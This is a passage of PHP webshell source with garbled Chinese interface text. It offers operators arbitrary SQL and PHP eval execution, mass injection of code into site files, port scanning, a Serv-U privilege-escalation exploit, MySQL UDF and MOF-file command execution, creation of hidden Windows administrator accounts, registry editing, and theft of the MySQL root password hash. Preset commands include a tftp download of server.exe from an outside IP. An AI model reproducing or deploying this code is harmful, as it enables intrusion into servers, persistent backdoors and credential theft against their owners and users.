mysql_fetch_array($query)) { html_a('?eanver=issql&db=' . $db['Database'], $db['Database']); echo '  '; } html_n(''); if ($_GET['db']) { css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); html_select(array(0 => "--SQL�﷨--", 7 => "��������", 8 => "ɾ������", 9 => "�޸�����", 10 => "�����ݱ�", 11 => "ɾ���ݱ�", 12 => "�����ֶ�", 13 => "ɾ���ֶ�"), 0, "onchange='return Full(options[selectedIndex].value)'"); html_input("submit", "doquery", "ִ��"); html_a("?eanver=issql&db=" . $_GET['db'], $_GET['db']); html_n('--->'); html_a("?eanver=issql&db=" . $_GET['db'] . "&table=" . $_GET['table'], $_GET['table']); html_n('

'); if (!empty($_POST['sql'])) { if (@mysql_query($_POST['sql'], $sqlcon)) { echo "ִ��SQL���ɹ�"; } else { echo "����: " . mysql_error(); } } if ($_GET['table']) { html_n(''); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon); $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); while ($text = @mysql_fetch_assoc($result)) { foreach ($fields as $row) { if ($text[$row] == "") { $text[$row] = 'NULL'; } html_n(''); } echo ''; } } else { $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { html_n(""); } } } break; case "upfiles": html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(' \t \t \t \t
' . $row['Field'] . '
' . $text[$row] . '
" . $row[0] . "
�����������ϴ������ļ���С: ' . @get_cfg_var('upload_max_filesize') . '
'); html_input("text", "uppath", root_dir, "
�ϴ���·��: ", "51"); print << function addTank(){ var k=0; k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) newcell=newRow.insertCell() newcell.innerHTML=" " } function delTank() { if(tank.rows.length==1) return; var checkit = false; for (var i=0;i

��ѡ��Ҫ�ϴ����ļ���
END; html_n('
'); if ($_POST['upfiles']) { foreach ($_FILES["upfile"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $tmp_name = $_FILES["upfile"]["tmp_name"][$key]; $name = $_FILES["upfile"]["name"][$key]; $uploadfile = str_path($_POST['uppath'] . '/' . $name); $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3]; echo '

' . $upload; } } } html_n(''); break; case "guama": $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; html_n('
�ļ���������"|"����,Ҳ������ָ���ļ���.

'); html_input("text", "path", $patht, "·����Χ", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_input("text", "type", $typet, "

�ļ�����", "60"); html_text("code", "67", "5", $codet); html_n('

'); html_radio("��������", "��������", "guama", "qingma"); html_input("submit", "passreturn", "��ʼ"); html_n('
Ŀ���ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($patht, $codet, $_POST['return'], $bool, $typet); } break; case "tihuan": html_n('
�˹��ܿ������滻�ļ�����,��С��ʹ��.

'); html_input("text", "path", root_dir, "·����Χ", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_text("newcode", "67", "5", $_POST['newcode']); html_n('

�滻Ϊ'); html_text("oldcode", "67", "5", $_POST['oldcode']); html_input("submit", "passreturn", "�滻", "

"); html_n('
Ŀ���ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('
�˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ.
���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����.

'); html_input("text", "path", root_dir, "·����", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_input("text", "code", $_POST['code'], "

�ؼ���", "40"); html_select(array("--MYSQL�����ļ�--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); html_radio("�����ļ���", "������������", "scanfile", "scancode"); html_input("submit", "passreturn", "����"); html_n('
�ҵ��ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool); } break; case "scanphp": html_n('
ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��.

'); html_input("text", "path", root_dir, "���ҷ�Χ", "40"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����

�ű�����", "", true); html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP")); html_input("submit", "passreturn", "����", "

"); html_n('
�ҵ��ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool); } break; case "port": $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873'; print <<
ɨ��IP
�˿ں�
END; if (!empty($_POST['ip']) && !empty($_POST['port'])) { echo '
'; $ports = explode('|', $_POST['port']); for ($i = 0; $i < count($ports); $i++) { $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2); echo $fp ? '���Ŷ˿� ---> ' . $ports[$i] . '
' : '�رն˿� ---> ' . $ports[$i] . '
'; ob_flush(); flush(); } echo '
'; } break; case "getcode": if (isset($_POST['url'])) { $proxycontents = @file_get_contents($_POST['url']); echo $proxycontents ? $proxycontents : "

��ȡ URL ����ʧ��

"; exit; } print <<
���ߴ���

  • �ñ����ܽ�ʵ�ּ򵥵� HTTP ����,������ʾʹ�����·����ͼƬ�����Ӽ�CSS��ʽ��.
  • �ñ����ܿ���ͨ�������������Ŀ��URL,����֧�� SQL Injection ̽���Լ�ijЩ�����ַ�.
  • �ñ���������� URL,��Ŀ�����������µ�IP��¼�� : {$_SERVER['SERVER_NAME']}
URL:
END; break; case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print <<[ִ������] [�����û�]
\t
ServU�˿�
\t
ServU�û�
\t
ServU����
END; if ($_GET['o'] == 'adduser') { print <<�ʺ� ���� Ŀ¼ END; } else { print <<��Ȩ����
END; } echo '
'; if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) { echo '
'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n" . "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n" . "-TZOEnable=0\r\n" . " TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n" . "-IP=0.0.0.0\r\n" . "-PortNo=21\r\n" . "-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n" . "-IP=0.0.0.0\r\n" . " PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10); $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "USER " . $_POST["SUUser"] . "\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "PASS " . $_POST["SUPass"] . "\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; if (!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21", $errno, $errstr, 10); $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "USER " . $_POST['user'] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "PASS " . $_POST['password'] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: site exec " . $_POST["SUCommand"] . "
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; @fclose($exp); } @fclose($sock); echo '
'; } break; case "phpcode": $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; if ($phpcode != 'phpinfo();') { $phpcode = htmlspecialchars(base64_decode($phpcode)); } echo '
����д<? ?>��ǩ,�˹����Ż�ʹ��BASE64���ܴ��ͣ���ֹ������뱻�������˾�֪����ССϸ�ڣ�ע���ɾͣ�



'; if (!empty($_POST['phpcode'])) { echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); } html_n('
'); break; case "myexp": $MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.
mysql5.1�汾��������mysql���Ŀ¼��װUDF��������ʧ��������NTFS-ADS�����ܴ����ļ���'; $info = '�������'; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass); if ($conn) { @mysql_select_db($mdata); if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if (@mysql_query($query, $conn)) { $shellcode = Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));"; if (@mysql_query($query, $conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';'; if (@mysql_query($query, $conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function state returns string soname \'' . $inpath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '��װDLL�ɹ�' : '��װDLLʧ��'; } else { $MSG_BOX = '����DLL�ļ�ʧ��'; } } else { $MSG_BOX = 'д����ʱ��ʧ��'; } @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn); } else { $MSG_BOX = '������ʱ��ʧ��'; } } if (!empty($_POST['runcmd'])) { $query = 'select state("' . $sqlcmd . '");'; $result = @mysql_query($query, $conn); if ($result) { $k = 0; $info = NULL; while ($row = @mysql_fetch_array($result)) { $infotmp .= $row[$k]; $k++; } $info = $infotmp; $MSG_BOX = 'ִ�гɹ�'; } else { $MSG_BOX = 'ִ��ʧ��'; } } } else { $MSG_BOX = '����MYSQLʧ��'; } } print << function Fullm(i){ \tStr = new Array(11); \tStr[0] = "ver"; \tStr[1] = "net user KillWaf 1P@ssWord /add"; \tStr[2] = "net localgroup administrators KillWaf /add"; \tStr[3] = "net start Terminal Services"; \tStr[4] = "tasklist /svc"; \tStr[5] = "netstat -ano"; \tStr[6] = "ipconfig"; \tStr[7] = "net user guest /active:yes"; \tStr[8] = "copy c:\\\\1.php d:\\\\2.php"; \tStr[9] = "tftp -i 219.134.6.245 get server.exe c:\\\\server.exe"; \tStr[10] = "net start telnet"; \tStr[11] = "shutdown -r -t 0"; \tmform.sqlcmd.value = Str[i]; \treturn true; }
{$MSG_BOX}
��ַ �˿� �û� ���� ����
�ɼ���·��
��װ�ɹ������
END; break; case "mysql_exec": if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) { if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) { $cookietime = time() + 24 * 3600; setcookie('m_eanverhost', $_POST['mhost'], $cookietime); setcookie('m_eanverport', $_POST['mport'], $cookietime); setcookie('m_eanveruser', $_POST['muser'], $cookietime); setcookie('m_eanverpass', $_POST['mpass'], $cookietime); die('���ڵ�½,���Ժ�...'); } } print <<
��ַ
�˿�
�û�
����
END; break; case "winapi": //Windows����ӿ� //function winshell() //{ $nop = '  '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<

{$nop} -> CMD·��
{$nop}


END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript���ʧ��"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : 'silic'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<

Shell.Users������ӹ���Ա

{$nop}�½��û�����
{$nop}���û����룺




END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $shell1 = new COM("wscript.shell") or die("require windows host"); $action = isset($_POST['action']) ? $_POST['action'] : ''; echo '
'; echo '
��ȡ&д��&ɾ��ע���

'; echo '
'; print <<
Rpath: 

END; $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : ''; $rpath = str_replace("\\\\", "\\", $rpath); if ($action == "read") { $out = $shell1->RegRead($rpath); echo '
' . var_dump($out) . '
'; echo '

'; } print <<
Wpath:

Wtype:  Wvalue: 


END; $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : ''; $wpath = str_replace("\\\\", "\\", $wpath); $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : ''; $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : ''; if ($action == "write") { $shell1->RegWrite($wpath, $wvalue, $wtype); } print <<
Dpath:

END; $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : ''; $dpath = str_replace("\\\\", "\\", $dpath); if ($action == "del") { $out = $shell1->RegDelete($dpath); } } else { $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ���֮һ
Webshell���ڷ���������ΪWindowsϵͳ
PHP��Ȩ���������ڷdz����ε�ʱ����Գ��Ա�����



"; print <<

 [ WScript��� ] 



������ʹ��PHP����Windows����е�Wscript�����

Wscript����cmd�������
{$tip} [ Shell.User��� ] 



������ʹ��PHP����Windows����е�Shell.user���

USER���ΪWindowsϵͳ�û�����������
{$tip} [ ע������� ] 



������ʹ��PHP����Windows����е�Shell.Wscript���


�����ܿɶ�ȡ��д�룬ɾ��ע�������
RegRead()������ȡϵͳע�������
{$tip}
END; } //} break; case "mofshell": session_start(); if (!empty($_POST['submit'])) { setcookie("connect"); setcookie("connect[host]", $_POST['host']); setcookie("connect[user]", $_POST['user']); setcookie("connect[pass]", $_POST['pass']); setcookie("connect[dbname]", $_POST['dbname']); setcookie("connect[path]", $_POST['path']); echo ""; } if (empty($_GET["action"])) { echo "
"; echo "ip:"; echo "

"; echo "�ʻ�:"; echo "

"; echo "����:"; echo "

"; echo "����:"; echo "

"; echo "��дĿ¼(''savefile''���ļ���):"; echo "

"; echo "

"; echo "
"; echo "
ps:mof��Ȩ������windows������
1:mof��Ȩ����wscript.shell�齨ִ�������shell.users���û�
2:����������ʱ�����ã�����Ӱ��ִ��Ч��
3:������֧��wscript.shell��shell.user˫����Ȩ
4:ִ����Ϻ���ȴ�Щʱ���ٲ鿴���
5:2�ַ�ʽ����ͬһʱ��ִ�У������ĵȴ��������ִ����������

��ͣ���ʻ�����취:
"; echo "\r\n��һ net stop winmgmt ֹͣ����
\r\n�ڶ� ɾ���ļ��У�C:\\WINDOWS\\system32\\wbem\\Repository\\
\r\n���� net start winmgmt ��������
\r\n���ģ���ϲ�����ִ���ˡ�
\r\nC:\\WINDOWS\\system32\\wbem\\Repository\\ �ŵ��Ǵ���⡡����ִ�е�.mof���ᱻ���뵽������ˡ�
\r\nȻ��һֱ���ű����õ�ʱ��ִ�С���
\r\nɾ�����������������ؽ���Ĭ�ϴ���⡡����������ǰִ��mof��û�ˡ�
"; exit; } if ($_GET[action] == 'connect') { $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('
' . mysql_error() . '
'); echo "
"; echo "
Cmd:"; echo "
"; echo "
"; echo "

"; echo "
"; echo ""; echo "
"; echo ""; echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if (isset($_POST['cmd'])) { $strCmd = $_POST['cmd']; $cmdshell = 'cmd /c ' . $strCmd . '>' . $_COOKIE["connect"]["path"]; $mofname = "c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n Name = \"filtP2\";\r\n Query = \"Select * From __InstanceModificationEvent \"\r\n \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n \"And TargetInstance.Second = 5\";\r\n QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n Name = \"consPCSV2\";\r\n ScriptingEngine = \"JScript\";\r\n ScriptText =\r\n \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"{$cmdshell}\\\\\")\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \$Consumer;\r\n Filter = \$EventFilter;\r\n};"; mysql_select_db($_COOKIE["connect"]["dbname"], $conn); $sql1 = "select '{$payload}' into dumpfile '{$mofname}';"; if (mysql_query($sql1)) { echo "
ִ�����!
����\"��ȡwscriptִ�н��\"�鿴���!!
���ɹ���ִ�м��Ρ�
ps:wscriptִ����Ҫwscript.shell�齨���ڡ�
"; } else { die(mysql_error()); } mysql_close($conn); } if (isset($_POST['flag'])) { $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('
' . mysql_error() . '
'); $sql2 = "select load_file(\"" . $_COOKIE["connect"]["path"] . "\");"; $result2 = mysql_query($sql2); $num = mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "
"; echo '
' . $row[0] . '
'; } mysql_close($conn); } if (isset($_POST['shelluser'])) { $mofname = "c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n Name = \"filtP2\";\r\n Query = \"Select * From __InstanceModificationEvent \"\r\n \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n \"And TargetInstance.Second = 5\";\r\n QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n Name = \"consPCSV2\";\r\n ScriptingEngine = \"JScript\";\r\n ScriptText = \r\n\"var WSH = new ActiveXObject(\\\\\"Shell.Users\\\\\")\\\\nz=WSH.create(\\\\\"MofNewUser\\\\\")\\\\nz.changePassword(\\\\\"ASDfg123!@#...\\\\\", \\\\\"\\\\\")\\\\nz.setting(\\\\\"AccountType\\\\\")=3\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \$Consumer;\r\n Filter = \$EventFilter;\r\n};"; mysql_select_db($_COOKIE["connect"]["dbname"], $conn); $sql1 = "select '{$payload}' into dumpfile '{$mofname}';"; if (mysql_query($sql1)) { echo "
ִ���������,�ʻ���MofNewUser ���룺ASDfg123!@#...
ps:ShellUser�����޻��Թ���,��5���Ӻ����в鿴���
"; } else { die(mysql_error()); } mysql_close($conn); } } break; case "readpass": if (isset($_POST['sub'])) { $name = $_POST['name']; $pass = $_POST['password']; $host = $_POST['host']; $db = $_POST['db']; $link = mysql_connect($host, $name, $pass); if (!link) { die("could not connect" . mysql_error()); } if (!mysql_select_db($db, $link)) { die("db" . mysql_error()); } $db_path_sql = "select @@basedir"; if ($n = mysql_query($db_path_sql)) { $db_path_rs = mysql_fetch_array($n); $db_path = str_replace("\\", "/", $db_path_rs[0]); } $dropmoon = 'DROP table moon'; $sql = "CREATE TABLE moon (`code` TEXT NOT NULL ) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_general_ci;"; $exp = "LOAD DATA LOCAL INFILE '" . $db_path . "data/mysql/user.MYD' INTO TABLE moon fields terminated by '' LINES TERMINATED BY '\0';"; $select = "SELECT code FROM moon"; $pass = ""; mysql_query($dropmoon); if (mysql_query($sql)) { if ($row = mysql_query($exp)) { if ($row = mysql_query($select)) { while ($rows = mysql_fetch_array($row)) { echo $pass .= $rows['code']; } } } } } else { echo '
'; echo "

MYSQL��Ȩ�޶�ȡROOT���빤��

"; echo '
ip��   
'; echo '
�ʻ���
'; echo '
���룺
'; echo '
������
'; echo '
  
'; } break; case "othersql": //�������ݿ����� //function otherdb(){ $db = isset($_GET['db']) ? $_GET['db'] : 'ms'; print <<
  MSSQL     Oracle     InforMix     FireBird     DB2  
END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<
������ �ʻ�: ����: ����:

END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '' . "\n\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '\n"; } echo "\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo ''; } echo "\n"; } echo "
' . mssql_field_name($msresult, $i) . "
' . "{$msrow[$i]}" . '
"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<
����: �˿�: �ʻ�: ����: SID:

END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '' . "\n\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '\n"; } echo "\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo ''; } echo "\n"; } echo "
' . oci_field_name($oraresult, $i) . "
' . "{$orarow[$i]}" . '
"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<
����: �ʻ�: ����:

END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '' . "\n\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '\n"; } echo "\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo ''; } echo "\n"; } echo "
' . ifx_fieldproperties($ifxresult) . "
' . "{$ifxrow[$i]}" . '
"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<
����: �˿�: �ʻ�: ����: ����:

END; if ($myaction == 'db2query') { $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '' . "\n\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '\n"; } echo "\n"; while ($db2row = db2_fetch_row($db2result)) { echo "\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo ''; } echo "\n"; } echo "
' . db2_field_name($db2result) . "
' . "{$db2row[$i]}" . '
"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<
����: ��ַ: �ʻ�: ����:

